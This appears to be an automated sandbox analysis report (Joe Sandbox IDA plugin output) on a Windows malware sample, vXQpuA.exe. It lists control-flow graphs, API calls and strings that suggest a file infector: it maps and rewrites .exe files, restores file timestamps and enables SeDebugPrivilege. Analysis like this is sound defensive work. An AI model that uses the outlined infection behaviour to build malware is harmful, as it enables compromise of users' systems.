                                                control_flow_graph 0 611e6e-611e95 call 612d60 3 611e97 call 611d8a 0->3 4 611e9c-611eaa call 611df6 0->4 3->4 8 611eb0-611ed9 SetFileAttributesA CreateFileA 4->8 9 612332 4->9 8->9 10 611edf-611f28 call 611915 SetFilePointer CreateFileMappingA MapViewOfFile 8->10 11 612338-61233b 9->11 10->9 20 611f2e-611f39 10->20 13 612346-612349 11->13 14 61233d-612340 UnmapViewOfFile 11->14 15 612350-612354 13->15 16 61234b-61234e FindCloseChangeNotification 13->16 14->13 18 612391-61239a call 612d9b 15->18 19 612356-61235b FindCloseChangeNotification 15->19 16->15 19->18 20->9 22 611f3f-611f56 20->22 22->9 24 611f5c-611f64 22->24 24->9 25 611f6a-611f70 24->25 25->9 26 611f76-611f87 call 611c81 25->26 26->9 29 611f8d-611fa7 call 61185b call 611c81 26->29 29->9 34 611fad-611fb4 29->34 35 612024-612045 34->35 36 611fb6-611fc5 call 611af9 34->36 35->9 37 61204b-61204e 35->37 36->35 44 611fc7-611fd2 36->44 39 612070-6120f4 call 611af9 * 2 call 611c68 * 2 memset * 2 37->39 40 612050-612053 37->40 62 6120f5-6120fe 39->62 42 612056-61205a 40->42 42->39 45 61205c-612061 42->45 44->9 47 611fd8-611fe7 44->47 45->9 48 612067-61206e 45->48 50 611fe9-611fec 47->50 51 611fef-612006 call 611af9 47->51 48->42 50->51 57 612013-61201e FlushViewOfFile 51->57 58 612008-61200e call 611c68 51->58 57->35 58->57 63 612130-612139 62->63 64 612100-612114 62->64 67 61213c-612142 63->67 65 612116-61212a 64->65 66 61212d-61212e 64->66 65->66 66->62 68 612144-612150 67->68 69 61215c 67->69 70 612152-612154 68->70 71 612157-61215a 68->71 72 61215f-612162 69->72 70->71 71->67 73 612181-612184 72->73 74 612164-612171 72->74 77 612186 73->77 78 61218d-6121ba call 611c68 73->78 75 612177-61217e 74->75 76 61232a-61232d 74->76 75->73 76->72 77->78 81 6121d3-61220b call 611c81 call 611c68 78->81 82 6121bc-6121d0 call 611c68 78->82 89 61221b-61221e 81->89 90 61220d-612218 call 611c68 81->90 82->81 92 612220-612223 89->92 93 612226-61231a memcpy UnmapViewOfFile CloseHandle call 611b8a call 61185b SetFilePointer SetEndOfFile SetFilePointer WriteFile * 2 call 611915 89->93 90->89 92->93 100 61231f-612328 CloseHandle 93->100 100->11
                                                APIs
                                                • SetFileAttributesA.KERNELBASE(?,00000080,?,006132B0,00000164,00612986,?), ref: 00611EB9
                                                • CreateFileA.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000080,00000000), ref: 00611ECD
                                                • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000002,00000000,00000000), ref: 00611EF3
                                                • CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00000000,00000000), ref: 00611F07
                                                • MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00000400), ref: 00611F1D
                                                • FlushViewOfFile.KERNEL32(?,00000400,?,00000000,00000000,?,00000000,00000002), ref: 0061201E
                                                • memset.MSVCRT ref: 006120D8
                                                • memset.MSVCRT ref: 006120EA
                                                • memcpy.MSVCRT ref: 0061222D
                                                • UnmapViewOfFile.KERNEL32(?,?,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00612238
                                                • CloseHandle.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0061224A
                                                • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000002,?,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122C6
                                                • SetEndOfFile.KERNELBASE(000000FF,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122CB
                                                • SetFilePointer.KERNELBASE(000000FF,?,00000000,00000002,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122DD
                                                • WriteFile.KERNELBASE(000000FF,00614008,00000271,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 006122F7
                                                • WriteFile.KERNELBASE(000000FF,?,00000000,?,?,?,00000000,00000000,?,00000000,00000002), ref: 0061230D
                                                • CloseHandle.KERNEL32(000000FF,000000FF,00000001,?,?,?,00000000,00000000,?,00000000,00000002), ref: 00612322
                                                • UnmapViewOfFile.KERNEL32(?,?,006132B0,00000164,00612986,?), ref: 00612340
                                                • FindCloseChangeNotification.KERNELBASE(?,?,006132B0,00000164,00612986,?), ref: 0061234E
                                                • FindCloseChangeNotification.KERNELBASE(000000FF,?,006132B0,00000164,00612986,?), ref: 00612359
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$CloseView$Pointer$ChangeCreateFindHandleNotificationUnmapWritememset$AttributesFlushMappingmemcpy
                                                • String ID: .@a$5@a$<@a$C@a$m@a
                                                • API String ID: 3349749541-1651383129
                                                • Opcode ID: 26bde03b186d386a4bf17692afa123f40b2a73d85586f3756303b0ea8b6f58fd
                                                • Instruction ID: 60dbcdbf8ec51ff9aee45437fd1cecdc0a1dbe02c7ea0e803346bb045ac9bd97
                                                • Opcode Fuzzy Hash: 26bde03b186d386a4bf17692afa123f40b2a73d85586f3756303b0ea8b6f58fd
                                                • Instruction Fuzzy Hash: F9F16E71900209EFCB20DFA4DC91AEDBBB6FF08314F18852AE519AB651D734AE91CF54
                                                Function 00611973 Relevance: 28.1, APIs: 12, Strings: 4, Instructions: 144filesleepmemoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 117 611973-61199a PathFileExistsA 118 6119a0-6119aa 117->118 119 611ac7-611acc 117->119 120 6119af-6119c2 CreateFileA 118->120 121 611ad0-611ad5 119->121 122 611ace 119->122 123 6119c4-6119d3 Sleep 120->123 124 611a28-611a36 GetFileSize 120->124 125 611af0-611af6 121->125 126 611ad7-611ad9 121->126 122->121 123->120 127 6119d5-611a0b call 61185b wsprintfA CopyFileA 123->127 128 611a87-611a8b 124->128 129 611a38-611a3b 124->129 126->125 127->124 141 611a0d-611a26 CreateFileA 127->141 130 611a96-611a9a 128->130 131 611a8d-611a90 FindCloseChangeNotification 128->131 129->128 133 611a3d-611a51 VirtualAlloc 129->133 134 611aad-611ab1 130->134 135 611a9c 130->135 131->130 133->128 137 611a53-611a57 133->137 139 611ab3-611ab6 134->139 140 611adb-611ae0 134->140 138 611aa0-611aa7 DeleteFileA 135->138 142 611a80 137->142 143 611a59-611a6d ReadFile 137->143 138->134 139->119 144 611ab8-611ac1 VirtualFree 139->144 146 611ae2-611ae5 140->146 147 611ae7-611aec 140->147 141->124 145 611a9e 141->145 142->128 143->128 148 611a6f-611a7e 143->148 144->119 145->138 146->147 147->125 149 611aee 147->149 148->142 148->143 149->125
                                                APIs
                                                • PathFileExistsA.KERNELBASE(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 00611992
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
                                                • Sleep.KERNEL32(00000064), ref: 006119C6
                                                • wsprintfA.USER32 ref: 006119EC
                                                • CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
                                                • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
                                                • GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
                                                • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00611A46
                                                • ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00611A65
                                                • FindCloseChangeNotification.KERNELBASE(000000FF), ref: 00611A90
                                                • DeleteFileA.KERNEL32(?), ref: 00611AA7
                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00611AC1
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 006119DB
                                                • \Na`Na, xrefs: 00611980
                                                • C:\Users\user\AppData\Local\Temp\vXQpuA.exe, xrefs: 0061197C
                                                • %s%.8X.data, xrefs: 006119E6
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$CreateVirtual$AllocChangeCloseCopyDeleteExistsFindFreeNotificationPathReadSizeSleepwsprintf
                                                • String ID: %s%.8X.data$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\vXQpuA.exe$\Na`Na
                                                • API String ID: 2523042076-2794851130
                                                • Opcode ID: 723bc10770dbc7640d11d3b3a95c653e58e9c0e0595209fa176e3abfed372a8d
                                                • Instruction ID: c67cb0a00aa23ca64eefc02f62e4814ed13199dc0dcdaf5fa232a6df2ff84f2b
                                                • Opcode Fuzzy Hash: 723bc10770dbc7640d11d3b3a95c653e58e9c0e0595209fa176e3abfed372a8d
                                                • Instruction Fuzzy Hash: AF515271901259EFCF109F94CC84AEEBFBAEF0A355F184569F616EA290D3309E90CB50
                                                Function 006128B8 Relevance: 24.6, APIs: 9, Strings: 5, Instructions: 100stringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 150 6128b8-6128ff memset wsprintfA 151 612905-61290d 150->151 152 6129db-6129df 150->152 151->152 153 612913-612919 151->153 154 612956-612965 strrchr 153->154 155 61291b-61294c memset wsprintfA call 6129e2 153->155 154->152 157 612967-612978 lstrcmpiA 154->157 160 612951 155->160 158 612988-612992 lstrcmpiA 157->158 159 61297a-612981 call 611e6e 157->159 158->152 162 612994-61299b 158->162 163 612986 159->163 160->152 164 6129ad-6129c9 strstr 162->164 165 61299d-6129a3 162->165 163->152 167 6129d3-6129d6 call 612692 164->167 168 6129cb-6129d1 call 61239d 164->168 165->164 166 6129a5-6129a7 lstrcpy 165->166 166->164 167->152 168->152
                                                APIs
                                                • memset.MSVCRT ref: 006128D3
                                                • wsprintfA.USER32 ref: 006128F7
                                                • memset.MSVCRT ref: 00612925
                                                • wsprintfA.USER32 ref: 00612940
                                                  • Part of subcall function 006129E2: memset.MSVCRT ref: 00612A02
                                                  • Part of subcall function 006129E2: wsprintfA.USER32 ref: 00612A1A
                                                  • Part of subcall function 006129E2: memset.MSVCRT ref: 00612A44
                                                  • Part of subcall function 006129E2: lstrlen.KERNEL32(?), ref: 00612A54
                                                  • Part of subcall function 006129E2: lstrcpyn.KERNEL32(?,?,-00000001), ref: 00612A6C
                                                  • Part of subcall function 006129E2: strrchr.MSVCRT ref: 00612A7C
                                                  • Part of subcall function 006129E2: lstrcmpiA.KERNEL32(?,Documents and Settings), ref: 00612A9F
                                                  • Part of subcall function 006129E2: lstrlen.KERNEL32(Documents and Settings), ref: 00612AAE
                                                  • Part of subcall function 006129E2: memset.MSVCRT ref: 00612AC6
                                                  • Part of subcall function 006129E2: memset.MSVCRT ref: 00612ADA
                                                  • Part of subcall function 006129E2: FindFirstFileA.KERNELBASE(?,?), ref: 00612AEF
                                                  • Part of subcall function 006129E2: memset.MSVCRT ref: 00612B13
                                                • strrchr.MSVCRT ref: 00612959
                                                • lstrcmpiA.KERNEL32(00000001,exe), ref: 00612974
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: memset$wsprintf$lstrcmpilstrlenstrrchr$FileFindFirstlstrcpyn
                                                • String ID: %s%s$%s\$C:\Users\user\AppData\Local\Temp\$exe$rar
                                                • API String ID: 3004273771-898104377
                                                • Opcode ID: b9da12d2179268b1e9b2c205e1aed13a02f8a5df0e69e32eb4baba4201895df4
                                                • Instruction ID: 6532814002a54596f2e8f6136d3fece380a265a67b8f33b3481bffbe38b7bad2
                                                • Opcode Fuzzy Hash: b9da12d2179268b1e9b2c205e1aed13a02f8a5df0e69e32eb4baba4201895df4
                                                • Instruction Fuzzy Hash: 5B31EA7194031E7BDB20A76ADC95FCA37AE9F14310F0D0857F545A3280E6B4DBD48BA0
                                                Function 00611638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70stringsynchronizationthreadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 0061164F
                                                • GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 0061165B
                                                • GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\vXQpuA.exe,00000104), ref: 0061166E
                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00001099,00000000,00000000,00000000), ref: 006116AC
                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 006116BD
                                                  • Part of subcall function 0061139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 006113BC
                                                  • Part of subcall function 0061139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006113DA
                                                  • Part of subcall function 0061139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00611448
                                                • lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 006116E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\vXQpuA.exe$C:\Windows\system32$Documents and Settings
                                                • API String ID: 123563730-542475441
                                                • Opcode ID: 63a3fb7ee5a35819c12fa68dfce180456dedf1e0bda332033de7eb1bb3e77268
                                                • Instruction ID: c1dcd9a03b00e10779a93785b5febaa4e8d71cddc91972bc84d479ab7e37c2ab
                                                • Opcode Fuzzy Hash: 63a3fb7ee5a35819c12fa68dfce180456dedf1e0bda332033de7eb1bb3e77268
                                                • Instruction Fuzzy Hash: BD11D6715001247BCF205BA0AD49EDB3EAFEF0B362F0D5016F30A992A0CA7145C0D7A1
                                                Function 00612C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50threadCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 363 612c48-612c75 memset call 611973 366 612cb2-612cb9 363->366 367 612c77-612c7f 363->367 370 612cc8-612ccc 366->370 371 612cbb-612cc2 VirtualFree 366->371 368 612c81-612c8b 367->368 369 612c8f-612cac CreateThread WaitForMultipleObjects 367->369 368->369 369->366 371->370
                                                APIs
                                                • memset.MSVCRT ref: 00612C57
                                                  • Part of subcall function 00611973: PathFileExistsA.KERNELBASE(\Na`Na,00000000,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 00611992
                                                  • Part of subcall function 00611973: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 006119BA
                                                  • Part of subcall function 00611973: Sleep.KERNEL32(00000064), ref: 006119C6
                                                  • Part of subcall function 00611973: wsprintfA.USER32 ref: 006119EC
                                                  • Part of subcall function 00611973: CopyFileA.KERNEL32(?,?,00000000), ref: 00611A00
                                                  • Part of subcall function 00611973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00611A1E
                                                  • Part of subcall function 00611973: GetFileSize.KERNEL32(?,00000000), ref: 00611A2C
                                                  • Part of subcall function 00611973: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 00611A46
                                                  • Part of subcall function 00611973: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00611A65
                                                • CreateThread.KERNELBASE(00000000,00000000,00612B8C,00000000,00000000,00000000), ref: 00612C99
                                                • WaitForMultipleObjects.KERNEL32(00000001,006116BA,00000001,000000FF,?,006116BA,00000000), ref: 00612CAC
                                                • VirtualFree.KERNEL32(007F0000,00000000,00008000,C:\Users\user\AppData\Local\Temp\vXQpuA.exe,00614E5C,00614E60,?,006116BA,00000000), ref: 00612CC2
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\vXQpuA.exe, xrefs: 00612C69
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                • String ID: C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                                • API String ID: 2042498389-3243034452
                                                • Opcode ID: 56fa2a4f66104d298270385df844c5d1f88bb007cc831c8059d5b28338dbec65
                                                • Instruction ID: e32badba721ac0a266cbaf12613a00ea936d93f0ddaab6ea5afafd462113c682
                                                • Opcode Fuzzy Hash: 56fa2a4f66104d298270385df844c5d1f88bb007cc831c8059d5b28338dbec65
                                                • Instruction Fuzzy Hash: DF01D4716412217BD75097949C1AEDF7FAEEF01B60F088115B605DA2C1D9A09990C7E0
                                                Function 006114E1 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 372 6114e1-6114fb 373 611541-611547 372->373 374 6114fd-611510 GetModuleHandleA 372->374 377 611573-611574 call 611638 373->377 378 611549-61154c 373->378 375 611512-611518 374->375 376 61151a-611535 VirtualQuery 374->376 375->373 379 611537-611539 376->379 380 61153b 376->380 385 611579-61157a ExitProcess 377->385 381 611569-611570 378->381 382 61154e-611555 378->382 379->373 379->380 380->373 382->381 384 611557-611566 call 611af9 382->384 384->381
                                                APIs
                                                • GetModuleHandleA.KERNEL32(00000000), ref: 00611504
                                                • VirtualQuery.KERNEL32(006114E1,?,0000001C), ref: 00611525
                                                • ExitProcess.KERNEL32 ref: 0061157A
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: ExitHandleModuleProcessQueryVirtual
                                                • String ID:
                                                • API String ID: 3946701194-0
                                                • Opcode ID: 45bc568c5c4ad3140564c360a3f50f2ba585b756154b6dfa8a05430d767da7da
                                                • Instruction ID: a2fd11c28bec24ae4142ac9c0612d3fd795b0936b92c25b69937af3d7d429ef1
                                                • Opcode Fuzzy Hash: 45bc568c5c4ad3140564c360a3f50f2ba585b756154b6dfa8a05430d767da7da
                                                • Instruction Fuzzy Hash: 36115EB1D01215DFCF10DFA5B8856FD77BBEB85711B18A02BF602DB250E6348981EB50
                                                Function 00611915 Relevance: 4.5, APIs: 3, Instructions: 41timeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 388 611915-611922 389 611924-611926 388->389 390 611928-61192c 388->390 391 61196e-611970 389->391 392 61194f-611952 390->392 393 61192e-61194d memset GetFileTime 390->393 392->391 395 611954-611960 SetFileTime 392->395 394 611966-611968 393->394 396 61196a 394->396 397 61196c 394->397 395->394 396->397 397->391
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: FileTimememset
                                                • String ID:
                                                • API String ID: 176422537-0
                                                • Opcode ID: 323f1d4380aa0f9c77b46b170d48acb819f83beca1e49e3ab9416b907dd605e7
                                                • Instruction ID: 6573639a602018b0c992fb00b018dde77bb7bfe688e7d3fb707ba593f18ce745
                                                • Opcode Fuzzy Hash: 323f1d4380aa0f9c77b46b170d48acb819f83beca1e49e3ab9416b907dd605e7
                                                • Instruction Fuzzy Hash: BDF04432200219ABDB209E26DC04AE777EEAB55361F08893AF626D9150E730D685CBF0

                                                Non-executed Functions

                                                Function 0061119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\vXQpuA.exe,?,?,?,?,?,?,006113EF), ref: 006111AB
                                                • OpenProcessToken.ADVAPI32(00000000,00000028,006113EF,?,?,?,?,?,?,006113EF), ref: 006111BB
                                                • AdjustTokenPrivileges.ADVAPI32(006113EF,00000000,?,00000010,00000000,00000000), ref: 006111EB
                                                • CloseHandle.KERNEL32(006113EF), ref: 006111FA
                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,006113EF), ref: 00611203
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\vXQpuA.exe, xrefs: 006111A5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                • String ID: C:\Users\user\AppData\Local\Temp\vXQpuA.exe
                                                • API String ID: 75692138-3243034452
                                                • Opcode ID: 4e08de804a504ec6e4adaebbb4d77f36efdaad3e51f9830d01aa999529719246
                                                • Instruction ID: 6f18135594e1f7a0df20ab76b18cc6bb71d03768579fc764d29619b51f6aa1a3
                                                • Opcode Fuzzy Hash: 4e08de804a504ec6e4adaebbb4d77f36efdaad3e51f9830d01aa999529719246
                                                • Instruction Fuzzy Hash: 0101D675900219EFDB00DFD4C989AEEBBBAFB08345F14856AE606E2250D7715F849B50
                                                Function 0061139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\vXQpuA.exe), ref: 006113BC
                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 006113DA
                                                • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00611448
                                                  • Part of subcall function 0061119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\vXQpuA.exe,?,?,?,?,?,?,006113EF), ref: 006111AB
                                                  • Part of subcall function 0061119F: OpenProcessToken.ADVAPI32(00000000,00000028,006113EF,?,?,?,?,?,?,006113EF), ref: 006111BB
                                                  • Part of subcall function 0061119F: AdjustTokenPrivileges.ADVAPI32(006113EF,00000000,?,00000010,00000000,00000000), ref: 006111EB
                                                  • Part of subcall function 0061119F: CloseHandle.KERNEL32(006113EF), ref: 006111FA
                                                  • Part of subcall function 0061119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,006113EF), ref: 00611203
                                                Strings
                                                • SeDebugPrivilege, xrefs: 006113D3
                                                • C:\Users\user\AppData\Local\Temp\vXQpuA.exe, xrefs: 006113A8
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.2257346189.0000000000611000.00000020.00000001.01000000.00000004.sdmp, Offset: 00610000, based on PE: true
                                                • Associated: 00000001.00000002.2257326966.0000000000610000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257362941.0000000000613000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257378022.0000000000614000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                • Associated: 00000001.00000002.2257393688.0000000000616000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_610000_vXQpuA.jbxd
                                                Similarity
                                                • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                • String ID: C:\Users\user\AppData\Local\Temp\vXQpuA.exe$SeDebugPrivilege
                                                • API String ID: 4123949106-3002367669
                                                • Opcode ID: 3ea71794a4073d5d2f578111ba73d48459f3c044b78bf94c9b870b004008e6ef
                                                • Instruction ID: c966b6fd8088b1b5583bffa806a919246786e2cd91d8e1efbb9f7041a00d03b2
                                                • Opcode Fuzzy Hash: 3ea71794a4073d5d2f578111ba73d48459f3c044b78bf94c9b870b004008e6ef
                                                • Instruction Fuzzy Hash: DD31A471D00219EADF20DBA5CC45FEEBBBAEB46704F14406AE714FA241D7309E85CB60
                                                Function 0061239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
